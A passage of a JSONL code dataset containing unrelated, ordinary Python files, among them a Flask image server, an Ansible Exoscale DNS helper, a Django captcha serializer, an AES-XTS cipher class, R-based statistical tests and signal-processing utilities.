each request\n x, y = move_circle()\n # images to be put it zip archive\n images = []\n # creating a cube to work with\n cube = Cube()\n cube.update_grid(request)\n # all modules of the cube\n modules = cube.modules\n for module in modules:\n for img in module.update_screens(x, y):\n images.append(img)\n # put the images into the response archive\n memory_file = io.BytesIO()\n img_num = 0\n with ZipFile(memory_file, \"w\") as zip_file:\n for module in range(cube.num_modules):\n for screen in range(cube.num_screens // cube.num_modules):\n output_img = images[img_num]\n encode_param = []\n # encode each of 24 images\n _, buffer = cv2.imencode('.bmp', output_img, encode_param)\n # add a specific info about the module this image belongs to\n # so first 3 images go to the first module, images 4, 5, 6 - to the second etc.\n zip_info = ZipInfo(\"modules/\" + str(module) + \"/screens/\" + str(screen) + \".bmp\")\n zip_info.compress_type = zipfile.ZIP_DEFLATED\n zip_info.compress_size = 1\n # insert the image into the archive\n zip_file.writestr(zip_info, buffer)\n img_num += 1\n memory_file.seek(0)\n response = make_response(memory_file.read())\n response.headers['Content-Type'] = 'application/zip'\n return response\n\n\n\nif __name__ == \"__main__\":\n\n host = None\n port = 2399\n threaded = True\n # starting the Flask app itself\n app.run(host=host, port=port, threaded=threaded)","sub_path":"gnomes/around_the_module.py","file_name":"around_the_module.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"162789540","text":"import csv\nimport os\n\nfname = \"./data/user_study/userStudy_yes_no_regional.csv\"\nfname_out = \"./data_/correlation/userStudy_scores_regional.csv\"\nsentences_ = list()\n\nactions = list()\n\nbias_dict = dict()\nwith open(fname, \"r\") as f:\n for i, line in enumerate(f.readlines()):\n if i == 0:\n continue\n line = line.rstrip('\\n')\n vect = line.split(',')\n actions.append(vect[0])\n acc = float(vect[1]) / (float(vect[1]) + float(vect[2]))\n bias_dict[vect[0]] = acc\n\ncsv_columns = ['Action', 'Score']\nos.makedirs(os.path.dirname(fname_out), exist_ok=True)\nwith open(fname_out, 'w') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(csv_columns)\n for action in actions:\n data_row = [\n action,\n bias_dict[action]\n ]\n writer.writerow(data_row)\n","sub_path":"MoRT/mort/plot_corr/compute_userstudy_scores.py","file_name":"compute_userstudy_scores.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"613191688","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2016, René Moser \n# Simplified BSD License (see licenses/simplified_bsd.txt or https://opensource.org/licenses/BSD-2-Clause)\n\nimport os\n\nfrom ansible.module_utils.six.moves import configparser\nfrom ansible.module_utils.six import integer_types, string_types\nfrom ansible.module_utils._text import to_native, to_text\nfrom ansible.module_utils.urls import fetch_url\n\nEXO_DNS_BASEURL = \"https://api.exoscale.ch/dns/v1\"\n\n\ndef exo_dns_argument_spec():\n return dict(\n api_key=dict(default=os.environ.get('CLOUDSTACK_KEY'), no_log=True),\n api_secret=dict(default=os.environ.get('CLOUDSTACK_SECRET'), no_log=True),\n api_timeout=dict(type='int', default=os.environ.get('CLOUDSTACK_TIMEOUT') or 10),\n api_region=dict(default=os.environ.get('CLOUDSTACK_REGION') or 'cloudstack'),\n validate_certs=dict(default=True, type='bool'),\n )\n\n\ndef exo_dns_required_together():\n return [['api_key', 'api_secret']]\n\n\nclass ExoDns(object):\n\n def __init__(self, module):\n self.module = module\n\n self.api_key = self.module.params.get('api_key')\n self.api_secret = self.module.params.get('api_secret')\n if not (self.api_key and self.api_secret):\n try:\n region = self.module.params.get('api_region')\n config = self.read_config(ini_group=region)\n self.api_key = config['key']\n self.api_secret = config['secret']\n except Exception as e:\n self.module.fail_json(msg=\"Error while processing config: %s\" % to_native(e))\n\n self.headers = {\n 'X-DNS-Token': \"%s:%s\" % (self.api_key, self.api_secret),\n 'Content-Type': 'application/json',\n 'Accept': 'application/json',\n }\n self.result = {\n 'changed': False,\n 'diff': {\n 'before': {},\n 'after': {},\n }\n }\n\n def read_config(self, ini_group=None):\n if not ini_group:\n ini_group = os.environ.get('CLOUDSTACK_REGION', 'cloudstack')\n\n keys = ['key', 'secret']\n env_conf = {}\n for key in keys:\n if 'CLOUDSTACK_%s' % key.upper() not in os.environ:\n break\n else:\n env_conf[key] = os.environ['CLOUDSTACK_%s' % key.upper()]\n else:\n return env_conf\n\n # Config file: $PWD/cloudstack.ini or $HOME/.cloudstack.ini\n # Last read wins in configparser\n paths = (\n os.path.join(os.path.expanduser('~'), '.cloudstack.ini'),\n os.path.join(os.getcwd(), 'cloudstack.ini'),\n )\n # Look at CLOUDSTACK_CONFIG first if present\n if 'CLOUDSTACK_CONFIG' in os.environ:\n paths += (os.path.expanduser(os.environ['CLOUDSTACK_CONFIG']),)\n if not any([os.path.exists(c) for c in paths]):\n self.module.fail_json(msg=\"Config file not found. Tried : %s\" % \", \".join(paths))\n\n conf = configparser.ConfigParser()\n conf.read(paths)\n return dict(conf.items(ini_group))\n\n def api_query(self, resource=\"/domains\", method=\"GET\", data=None):\n url = EXO_DNS_BASEURL + resource\n if data:\n data = self.module.jsonify(data)\n\n response, info = fetch_url(\n module=self.module,\n url=url,\n data=data,\n method=method,\n headers=self.headers,\n timeout=self.module.params.get('api_timeout'),\n )\n\n if info['status'] not in (200, 201, 204):\n self.module.fail_json(msg=\"%s returned %s, with body: %s\" % (url, info['status'], info['msg']))\n\n try:\n return self.module.from_json(to_text(response.read()))\n\n except Exception as e:\n self.module.fail_json(msg=\"Could not process response into json: %s\" % to_native(e))\n\n def has_changed(self, want_dict, current_dict, only_keys=None):\n changed = False\n for key, value in want_dict.items():\n # Optionally limit by a list of keys\n if only_keys and key not in only_keys:\n continue\n # Skip None values\n if value is None:\n continue\n if key in current_dict:\n if isinstance(current_dict[key], integer_types):\n if value != current_dict[key]:\n self.result['diff']['before'][key] = current_dict[key]\n self.result['diff']['after'][key] = value\n changed = True\n elif isinstance(current_dict[key], string_types):\n if value.lower() != current_dict[key].lower():\n self.result['diff']['before'][key] = current_dict[key]\n self.result['diff']['after'][key] = value\n changed = True\n else:\n self.module.fail_json(msg=\"Unable to determine comparison for key %s\" % key)\n else:\n self.result['diff']['after'][key] = value\n changed = True\n return changed\n","sub_path":"env/lib/python3.9/site-packages/ansible/module_utils/exoscale.py","file_name":"exoscale.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"448174416","text":"# %%\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt # 3.3 or higher\nfrom pyglotaran_examples.boilerplate import setup_case_study\nfrom pyglotaran_extras.plotting.plot_overview import plot_overview\nfrom pyglotaran_extras.plotting.style import PlotStyle\n\nfrom glotaran import read_model_from_yaml_file\nfrom glotaran import read_parameters_from_csv_file\nfrom glotaran import read_parameters_from_yaml_file\nfrom glotaran.analysis.optimize import optimize\nfrom glotaran.analysis.scheme import Scheme\nfrom glotaran.io import read_data_file\n\nDATA_PATH1 = \"data/Npq2_220219_800target3fasea.ascii\"\nDATA_PATH2 = \"data/trNpq2_220219_800target3fase10SAS5.ascii\"\nMODEL_PATH = \"models/model_guidance.yml\"\nPARAMETERS_FILE_PATH = \"models/parameters_guidance.yml\"\n\n# %% Setup necessary (output) paths\nresults_folder, script_folder = setup_case_study(Path(__file__))\noutput_folder = results_folder.joinpath(\"example_spectral_guidance\")\n\n\ndef main():\n\n # parameter_file = output_folder.joinpath(\"optimized_parameters.csv\")\n # if parameter_file.exists():\n # print(\"Optimized parameters exists: please check\")\n # parameters = read_parameters_from_csv_file(str(parameter_file))\n # else:\n # parameters = read_parameters_from_yaml_file(script_folder.joinpath(PARAMETERS_FILE_PATH))\n parameters = read_parameters_from_yaml_file(script_folder.joinpath(PARAMETERS_FILE_PATH))\n # %% Load in data, model and parameters\n dataset1 = read_data_file(script_folder.joinpath(DATA_PATH1))\n dataset2 = read_data_file(script_folder.joinpath(DATA_PATH2))\n model = read_model_from_yaml_file(script_folder.joinpath(MODEL_PATH))\n\n # %% Validate model and parameters\n print(model.validate(parameters=parameters))\n\n # %% Construct the analysis scheme\n scheme = Scheme(\n model,\n parameters,\n {\"dataset1\": dataset1, \"dataset2\": dataset2},\n optimization_method=\"Levenberg-Marquardt\",\n # maximum_number_function_evaluations=11,\n non_negative_least_squares=True,\n )\n\n # %% Optimize the analysis scheme (and estimate parameters)\n result = optimize(scheme)\n\n # %% Basic print of results\n print(result.markdown(True))\n\n return result\n\n\ndef save_result(result):\n # %% Save the results\n result.save(str(output_folder))\n\n\ndef load_and_plot_results():\n # %% Plot and save as PDF\n # This set subsequent plots to the glotaran style\n plot_style = PlotStyle()\n plt.rc(\"axes\", prop_cycle=plot_style.cycler)\n\n parameter_file = output_folder.joinpath(\"optimized_parameters.csv\")\n parameters = read_parameters_from_csv_file(str(parameter_file))\n print(f\"Optimized parameters loaded:\\n {parameters}\")\n\n result1 = output_folder.joinpath(\"dataset1.nc\")\n fig1 = plot_overview(result1, linlog=True, show_data=True)\n timestamp = datetime.today().strftime(\"%y%m%d_%H%M\")\n fig1.savefig(\n output_folder.joinpath(f\"plot_overview_1of2_{timestamp}.pdf\"), bbox_inches=\"tight\"\n )\n\n result2 = output_folder.joinpath(\"dataset2.nc\")\n fig2 = plot_overview(result2, linlog=True)\n timestamp = datetime.today().strftime(\"%y%m%d_%H%M\")\n fig2.savefig(\n output_folder.joinpath(f\"plot_overview_2of2_{timestamp}.pdf\"), bbox_inches=\"tight\"\n )\n plt.show()\n\n\nif __name__ == \"__main__\":\n print(f\"- Using folder {output_folder.name} to read/write files for this run\")\n result = main()\n save_result(result)\n load_and_plot_results()\n","sub_path":"pyglotaran_examples/ex_spectral_guidance/ex_spectral_guidance.py","file_name":"ex_spectral_guidance.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"609512282","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom thumbor.filters import BaseFilter, filter_method\n\n\nclass Filter(BaseFilter):\n @filter_method(\n BaseFilter.String,#word\n BaseFilter.PositiveNumber,#posX\n BaseFilter.PositiveNumber,#posY\n BaseFilter.String,#color name see: http://pillow.readthedocs.io/en/4.0.x/reference/ImageColor.html#color-names\n BaseFilter.PositiveNumber, #font-size\n BaseFilter.String, #font-family\n )\n def text(self, word, x, y, color, font_size, font_family=\"Tahoma\"):\n image = self.engine.image\n usr_font = ImageFont.truetype(font_family, font_size)\n drawer = ImageDraw.Draw(image)\n drawer.text((x, y), word, fill=color, font=usr_font)\n self.engine.image = image\n","sub_path":"thumbor_text_filter/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"368084018","text":"from itertools import islice\nfrom commit import commitWord\n\nprompt_string = 'Yes(y) | No(n) | Maybe(m) | Quit (q)?\\n'\n\nyes_option = ['yes', 'y']\nno_option = ['no', 'n']\nmaybe_option = ['maybe', 'm']\nquit_option = ['quit', 'q']\n\ninput_filename = \"tst\"\nreplacements_filename = '../scripts/Sources/stringReplacer/replacements'\napprovelist_filename = '../scripts/Sources/wordBreakingValidator/approveList'\n\nacceptable_answers = yes_option + no_option + maybe_option + quit_option\n\ndef next_n_lines(file_opened, N = 4):\n return [x.strip() for x in islice(file_opened, N)]\n\ndef do_yes_things(word, suggestion):\n with open(replacements_filename, \"a\") as file_obj:\n file_obj.write(f\"{suggestion}{word} \")\n file_obj.write('\\n')\n print('word: {} added to file: {}'.format(suggestion, replacements_filename))\n\ndef do_no_things(suggestion):\n with open(approvelist_filename, \"a\") as file_obj:\n file_obj.write(suggestion)\n file_obj.write('\\n')\n print('word: {} added to file: {}'.format(suggestion, approvelist_filename))\n\ndef do_maybe_things():\n pass\n\n\nwith open(input_filename) as file_obj:\n next_n_lines(file_obj, 2)\n \n arr = next_n_lines(file_obj)\n while len(arr) == 4:\n empty_line = arr[0]\n text = arr[1].split(':')\n suggestion = arr[2].split(':')\n frequency = arr[3].split(':')\n \n print('Text: {}, Suggestion: {}, Frequency {}'.format(text[1], suggestion[1], frequency[1]))\n print('\\n\\n')\n \n answer = input(prompt_string)\n while answer not in acceptable_answers:\n answer = input(prompt_string)\n \n if answer in quit_option:\n break\n \n if answer in yes_option:\n do_yes_things(text[1], suggestion[1])\n \n if answer in no_option:\n do_no_things(suggestion[1])\n \n if answer in maybe_option:\n do_maybe_things()\n \n arr = next_n_lines(file_obj)\n","sub_path":"tools/wordBreakCheck.py","file_name":"wordBreakCheck.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"570613038","text":"\nfrom rest_framework import serializers\nfrom django_redis import get_redis_connection\n\n#定义序列化器 用以校验生成的数据\nfrom utils.exceptions import logger\n\n\nclass RegisterSMSCodeSerializer(serializers.Serializer):\n text = serializers.CharField(label='用户输入验证码id',max_length=4,min_length=4,required=True)\n image_code_id = serializers.UUIDField(label='验证码唯一性')\n\n def validate(self,attrs):\n #获取用户提交的验证码\n text = attrs['text']\n image_code_id = attrs['image_code_id']\n print(image_code_id)\n\n #获取redis中储存的信息\n # #链接redis\n redis_conn = get_redis_connection('code')\n # image_id = redis_conn.get('image_code_id')\n print(image_code_id)\n redis_text = redis_conn.get('img_'+str(image_code_id))\n print(redis_text)\n #判断redis_text 是否存在\n if redis_text is None:\n raise serializers.ValidationError('验证码已经过期')\n #将redis中的验证码删除\n # try:\n # redis_conn.delete('image_'+image_code_id)\n # except Exception as e:\n # logger.error(e)\n #判断用户输入的验证码和redis 中的是否一致\n if redis_text.decode().lower() != text.lower():\n raise serializers.ValidationError('验证码错误')\n\n return attrs\n\n\n\n","sub_path":"mall/apps/verifications/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"202709466","text":"import os\nimport gevent\nfrom flask import Flask\nfrom flask_socketio import SocketIO\n\nfrom lib import create_recordings_saver\nfrom cloudasr.schema import db, session\nfrom cloudasr.models import WorkerTypesModel, RecordingsModel\nimport logging\n\n#logging.basicConfig()\n#logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)\n\napp = Flask(__name__)\n\nif 'CONNECTION_STRING' in os.environ:\n app.config.update(\n SECRET_KEY = '12345',\n DEBUG = False,\n SQLALCHEMY_POOL_RECYCLE=299,\n SQLALCHEMY_DATABASE_URI = os.environ['CONNECTION_STRING']\n )\nelif 'CONNECTION_STRING_FILE' in os.environ:\n scrfilepath = os.environ['CONNECTION_STRING_FILE']\n fl = open(scrfilepath,\"r\")\n app.config.update(\n SECRET_KEY = '12345',\n DEBUG = False,\n SQLALCHEMY_POOL_RECYCLE = 299,\n SQLALCHEMY_DATABASE_URI = fl.readline().replace('\\n', '')\n )\n fl.close()\nelse:\n print (\"Connection string not set\")\nsocketio = SocketIO(app)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb.init_app(app)\nwith app.app_context():\n db_session = session\n\nworker_types_model = WorkerTypesModel(db_session)\nrecordings_model = RecordingsModel(db_session, worker_types_model, os.environ['STORAGE_PATH'], os.environ['DOMAIN'])\nsaver = create_recordings_saver(\"tcp://0.0.0.0:5682\", recordings_model)\n\nif __name__ == \"__main__\":\n from gevent import monkey\n monkey.patch_all()\n gevent.spawn(saver.run)\n socketio.run(app, host=\"0.0.0.0\", port=80)\n","sub_path":"cloudasr/recordings/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"198900155","text":"n, k = map(int, input().split())\nwords = []\nvisited = [False] * 26\nresult = 0\n\nfor _ in range(n):\n word = input().replace('anta', '').replace('tica', '')\n words.append(word)\n\nif k < 5:\n print(0)\n exit()\nelif k == 26:\n print(26)\n exit()\n\nfor c in 'antic':\n visited[ord(c) - 97] = True\n\n\ndef backtracking(alpha, length):\n global result, visited\n\n if length == k - 5:\n count = 0\n\n for word in words:\n read = True\n for c in word:\n if not visited[c]:\n read = False\n break\n\n if read:\n count += 1\n\n result = max(result, count)\n\n for i in range(alpha, 26):\n if not visited[i]:\n visited[i] = True\n backtracking(i, length + 1)\n visited[i] = False\n\n\nbacktracking(0, 0)\nprint(result)\n","sub_path":"baekjoon/bruteforce/1062.py","file_name":"1062.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"79999209","text":"import tensorflow as tf\nimport scipy.misc\nimport model\nimport cv2\nfrom subprocess import call\nimport zmq\nimport struct\nimport numpy as np\n\nDEFAULT_CHECKPT_FILE = '/etc/vision_extra/configs/default_checkpoint'\nTENSOR_MSG_HEADER_FMT = 'iiiiiqq'\n# SHAPE = (360, 480, 3)\nSHAPE = (66, 200, 3)\n\ndef create_sockets(camera_addr, ctx):\n cam_sock = ctx.socket(zmq.SUB)\n cam_sock.setsockopt(zmq.SUBSCRIBE, b'')\n cam_sock.connect(camera_addr)\n print('connected to {}'.format(camera_addr))\n return cam_sock\n\ndef recv_camera_frame(cam_sock):\n img_header, img_data, image = None, None, None\n flags = 0\n while True:\n try:\n data_img_header = cam_sock.recv(flags)\n except zmq.ZMQError as e:\n if e.errno != zmq.EAGAIN: raise\n break\n img_header = struct.unpack(TENSOR_MSG_HEADER_FMT, data_img_header)\n img_data = cam_sock.recv()\n flags = zmq.NOBLOCK\n image = np.frombuffer(img_data, np.uint8).reshape(img_header[:4])\n return img_header, image\n\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver()\nsaver.restore(sess, \"save/model.ckpt\")\n\nimg = cv2.imread('steering_wheel_image.jpg',0)\nrows,cols = img.shape\n\nsmoothed_angle = 0\n\ncap = cv2.VideoCapture(0)\n\nctx = zmq.Context()\ncam_sock = create_sockets('ipc:///tmp/roborace_camera_FL', ctx)\n\nimage_b = np.zeros(SHAPE, np.uint8)\n\nwhile(cv2.waitKey(10) != ord('q')):\n # ret, frame = cap.read()\n\n img_header, image = recv_camera_frame(cam_sock)\n cv2.resize(image[0], dsize=(SHAPE[1], SHAPE[0]), dst=image_b,\n interpolation=cv2.INTER_NEAREST)\n\n degrees = model.y.eval(feed_dict={model.x: [image_b], model.keep_prob: 1.0})[0][0] * 180 / scipy.pi\n call(\"clear\")\n print(\"Predicted steering angle: \" + str(degrees) + \" degrees\")\n cv2.imshow('image_b', image[0])\n #make smooth angle transitions by turning the steering wheel based on the difference of the current angle\n #and the predicted angle\n smoothed_angle += 0.2 * pow(abs((degrees - smoothed_angle)), 2.0 / 3.0) * (degrees - smoothed_angle) / abs(degrees - smoothed_angle)\n M = cv2.getRotationMatrix2D((cols/2,rows/2),-smoothed_angle,1)\n dst = cv2.warpAffine(img,M,(cols,rows))\n cv2.imshow(\"steering wheel\", dst)\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"run_rr.py","file_name":"run_rr.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"507130413","text":"\"\"\"This file contains functions to perfrom hypothesis testing using R.\"\"\"\nimport rpy2.robjects as robjects\n\nwilcox_r = robjects.r['wilcox.test']\nshapiro_r = robjects.r['shapiro.test']\nnumeric = robjects.r['as.numeric']\nt_r = robjects.r['t.test']\n\n\ndef wilcox(x, y, alternative=\"two.sided\"):\n \"\"\"\n Return wilcox of x and y.\n\n Source: https://www.rdocumentation.org/packages/stats/versions/3.6.1/topics/wilcox.test\n :param x,y\n :param alternative: \"two.sided\", \"less\", \"greater\"\n \"\"\"\n if all(r==x[0] for r in x) or all(r==y[0] for r in y):\n return 1\n x_num = numeric(x)\n y_num = numeric(y)\n return wilcox_r(x_num, y_num, alternative=alternative).rx(\"p.value\")[0][0]\n\n\ndef t_test(x, y, alternative=\"two.sided\"):\n \"\"\"\n Return wilcox of x and y.\n\n Source https://www.rdocumentation.org/packages/stats/versions/3.6.1/topics/wilcox.test\n :param x,y\n :param alternative: \"two.sided\", \"less\", \"greater\"\n \"\"\"\n x_num = numeric(x)\n y_num = numeric(y)\n return t_r(x_num, y_num, alternative=alternative).rx(\"p.value\")[0][0]\n","sub_path":"chip2probe/util/stats_r.py","file_name":"stats_r.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"177333895","text":"from binascii import hexlify as hx, unhexlify as uhx\r\n\r\nfrom ...log import LogBase\r\n\r\nfrom .aesecb import AESECB\r\nfrom .common import sxor\r\n\r\n\r\nclass AESXTS(LogBase):\r\n '''Class for performing AES XTS cipher operations'''\r\n SectorSize: int=0x200\r\n def __init__(self, keys, sector=0):\r\n self.keys = keys[:16], keys[16:]\r\n if not(type(self.keys) is tuple and len(self.keys) == 2):\r\n raise TypeError('XTS mode requires a tuple of two keys.')\r\n self.K1 = AESECB(self.keys[0])\r\n self.K2 = AESECB(self.keys[1])\r\n\r\n self.sector = sector\r\n self.block_size = self.K1.block_size\r\n \r\n self.sector_size = AESXTS.SectorSize\r\n\r\n def __enter__(self):\r\n return self\r\n\r\n def encrypt(self, data, sector=None):\r\n if sector is None:\r\n sector = self.sector\r\n if len(data) % self.block_size:\r\n raise ValueError('Data is not aligned to block size!')\r\n out = b''\r\n while data:\r\n tweak = self.get_tweak(sector)\r\n out += self.encrypt_sector(data[:self.sector_size], tweak)\r\n data = data[self.sector_size:]\r\n sector += 1\r\n return out\r\n\r\n def encrypt_sector(self, data, tweak):\r\n if len(data) % self.block_size:\r\n raise ValueError('Data is not aligned to block size!')\r\n out = b''\r\n tweak = self.K2.encrypt(uhx('%032X' % tweak))\r\n while data:\r\n out += sxor(tweak, self.K1.encrypt(sxor(data[:0x10], tweak)))\r\n _t = int(hx(tweak[::-1]), 16)\r\n _t <<= 1\r\n if _t & (1 << 128):\r\n _t ^= ((1 << 128) | (0x87))\r\n tweak = uhx('%032X' % _t)[::-1]\r\n data = data[0x10:]\r\n return out\r\n\r\n def decrypt(self, data, sector=None):\r\n #log(f\"[aes128.py] [decrypt] len(data)={len(data)} | sector={sector}\")\r\n if sector is None:\r\n sector = self.sector\r\n if len(data) % self.block_size:\r\n raise ValueError('Data is not aligned to block size!')\r\n out = b''\r\n while data:\r\n tweak = self.get_tweak(sector)\r\n out += self.decrypt_sector(data[:self.sector_size], tweak)\r\n data = data[self.sector_size:]\r\n sector += 1\r\n return out\r\n\r\n def decrypt_sector(self, data, tweak):\r\n if len(data) % self.block_size:\r\n raise ValueError('Data is not aligned to block size!')\r\n out = b''\r\n tweak = self.K2.encrypt(uhx('%032X' % tweak))\r\n while data:\r\n a = self.K1.decrypt(sxor(data[:0x10], tweak))\r\n out += sxor(tweak, a)\r\n _t = int(hx(tweak[::-1]), 16)\r\n _t <<= 1\r\n if _t & (1 << 128):\r\n _t ^= ((1 << 128) | (0x87))\r\n tweak = uhx('%032X' % _t)[::-1]\r\n data = data[0x10:]\r\n return out\r\n\r\n def get_tweak(self, sector=None):\r\n if sector is None:\r\n sector = self.sector\r\n tweak = 0\r\n for i in range(self.block_size):\r\n tweak |= (sector & 0xFF) << (i * 8)\r\n sector >>= 8\r\n return tweak\r\n\r\n def set_sector(self, sector):\r\n self.sector = sector\r\n\r\n def __exit__(self, type, value, traceback):\r\n pass\r\n","sub_path":"pyhac/common/crypto/aes128/aesxts.py","file_name":"aesxts.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"157778648","text":"####################################\n####### General Library file #######\n####################################\n\nfrom .common_imports import *\n\n\n# import pycuda.autoinit\n# import pycuda.gpuarray as gpuarray\n# ONLY FOR LINUX\n# import skcuda.fft as cu_fft\n\ndef sampleSignal(signal, time, sample_frequency):\n \"\"\"Apply sampling on given signal.\"\"\"\n\n sampled_wave_time = []\n sampled_wave = []\n next_sample = 0\n \n # time interval between samples\n delta_t = 1/sample_frequency\n \n ## TODO -- maybe should interpolate first? .... \n ## TODO -- Should it take the average of the signal on a given time span???\n\n # sample approximately on the correct timing\n for idx,time in enumerate(time):\n if time >= next_sample:\n next_sample += delta_t\n sampled_wave_time.append(time)\n sampled_wave.append(signal[idx])\n \n sampled_wave_time = np.array(sampled_wave_time)\n sampled_wave = np.array(sampled_wave)\n return sampled_wave, sampled_wave_time\n\ndef assembleWaveListSameInterval(signal_list, time_interval, time_step):\n \"\"\"Given list of signals, concatenate them on a single np array, provided they have the same duration on each wave on list, and time step defining distance between points in each wave.\"\"\"\n\n # variable to shift data right, for each time frame passed\n shift = 0\n \n number_of_points = int(time_interval/time_step)\n # all_zeros = np.zeros((1+len(signal_list))*number_of_points)\n all_zeros = np.zeros(len(signal_list)*number_of_points)\n out_wave_train = all_zeros.copy()*(0+0j)\n\n for data in signal_list:\n # starts vector with all zeros plus actual data\n new_data = sumVectosDiffSizes(all_zeros.copy()*(0+0j), data)\n \n new_data = np.roll(new_data, (shift)*number_of_points)\n shift += 1\n\n\n out_wave_train = sumVectosDiffSizes(out_wave_train, new_data)\n out_wave_time = np.arange(0, len(out_wave_train))*time_step\n \n return out_wave_train, out_wave_time\n\ndef assembleWaveListDifferentIntervals(signal_list, time_interval_list, num_symbols, time_step):\n \"\"\"Given list of signals, list of time intervals for each symbol, and number of symbol for each, concatenate them on a single np array, given the same time step defining distance between points in each wave.\"\"\"\n \n total_duration = np.sum([sym_duration*num_symbols[idx] for idx, sym_duration in enumerate(time_interval_list)])\n # total_duration = np.sum(time_interval_list)\n total_number_of_points = int(total_duration/time_step)\n all_zeros = np.zeros(total_number_of_points)\n\n printDebug(total_duration)\n\n out_wave = all_zeros.copy()*(0+0j)\n \n number_of_points = 0\n for idx,data in enumerate(signal_list):\n\n # starts vector with all zeros plus actual data\n new_data = sumVectosDiffSizes(all_zeros.copy()*(0+0j), data)\n \n # plotDebug(new_data, np.arange(0, len(new_data))*time_step)\n new_data = np.roll(new_data, number_of_points)\n # plotDebug(new_data, np.arange(0, len(new_data))*time_step)\n\n # current data number of points\n number_of_points += int(time_interval_list[idx]*num_symbols[idx]/time_step)\n\n out_wave = sumVectosDiffSizes(out_wave, new_data)\n out_wave_time = np.arange(0, len(out_wave))*time_step\n \n return out_wave, out_wave_time\n\ndef butterFilter(data, cuttof, filter_order = 20, filter_type = 'low', plot = False):\n \"\"\"Apply Butterworth filter.\"\"\"\n\n DEBUG = False\n # DEBUG = True\n\n # nyquist frequency\n nyq = 0.5 * Global.simul_frequency\n\n # adjsut cuttof frequency\n if isinstance(cuttof, list):\n cuttof_nyq = []\n cuttof_nyq[0] = cuttof[0] / nyq\n cuttof_nyq[1] = cuttof[1] / nyq\n else:\n cuttof_nyq = cuttof / nyq\n\n # data time frame\n number_points = len(data)\n time_frame = number_points*Global.time_step\n\n number_samples = int(Global.simul_frequency*time_frame)\n \n t = np.linspace(0, time_frame, number_samples, False)\n \n if DEBUG:\n # For testing\n f0 = 10e6\n f1 = 40e6\n data = np.sin(2*np.pi*f0*t) + np.sin(2*np.pi*f1*t)\n # data = np.sin(2*np.pi*f0*t)\n \n if plot:\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True)\n ax1.plot(t, data)\n ax1.set_title('Time domain signal')\n ax1.grid()\n\n # Create filter\n sos = signal.butter(filter_order, cuttof_nyq, btype=filter_type, output='sos')\n\n # yf = fftpack.fft(data)\n # xf = np.linspace(0.0, 1.0/(2.0*time_frame), int(number_samples/2))\n\n # fig, ax = plt.subplots()\n # ax.plot(xf, 2.0/number_samples * np.abs(yf[:number_samples//2]))\n # plt.show()\n\n\n # filtered signal\n filtered = signal.sosfilt(sos, data)\n\n # get filter frequency and absolute value\n w, h = signal.sosfreqz(sos, worN=number_points)\n \n if plot:\n ax2.plot(t, filtered)\n ax2.set_title('Filtered signal.')\n # ax2.axis([0, 1, -2, 2])\n ax2.set_xlabel('Time [seconds]')\n plt.tight_layout()\n ax2.grid()\n plt.show()\n\n plt.semilogx((Global.simul_frequency * 0.5 / np.pi) * w, 20 * np.log10(abs(h)))\n\n plt.title('Butterworth filter frequency response')\n plt.xlabel('Frequency [radians / second]')\n plt.ylabel('Amplitude [dB]')\n plt.margins(0, 0.1)\n plt.grid(which='both', axis='both')\n plt.axvline(cuttof, color='green') # cutoff frequency\n # plt.grid()\n plt.show()\n\n # plotBode(data, time_frame, number_samples, cuttof, data2=filtered)\n plotBode(data, t, number_samples, cuttof, data2=filtered)\n \n return filtered\n\ndef plotBode(data, time, freq_ref, data2 = None, time2 = None):\n\n time_frame = np.max(time)\n number_samples = len(time)\n \n \"\"\"Inrerpolate data to be in conformity with time vector.\"\"\"\n yf = fftpack.fft(data)\n xf = np.linspace(0.0, 1.0/(2.0*time_frame), int(number_samples/2))\n if data2 is not None:\n yf2 = fftpack.fft(data2)\n if time2 is not None:\n time_frame2 = np.max(time2)\n number_samples2 = len(time2)\n else:\n time_frame2 = time_frame\n number_samples2 = number_samples\n xf2 = np.linspace(0.0, 1.0/(2.0*time_frame2), int(number_samples2/2))\n \n # plt.semilogx((Global.simul_frequency * 1 / np.pi) * w, 20 * np.log10(abs(yf)))\n plt.semilogx(xf*0.5, 20 * np.log10(abs(2.0/number_samples * np.abs(yf[:number_samples//2]))))\n if data2 is not None:\n plt.semilogx(xf2*0.5, 20 * np.log10(abs(2.0/number_samples2 * 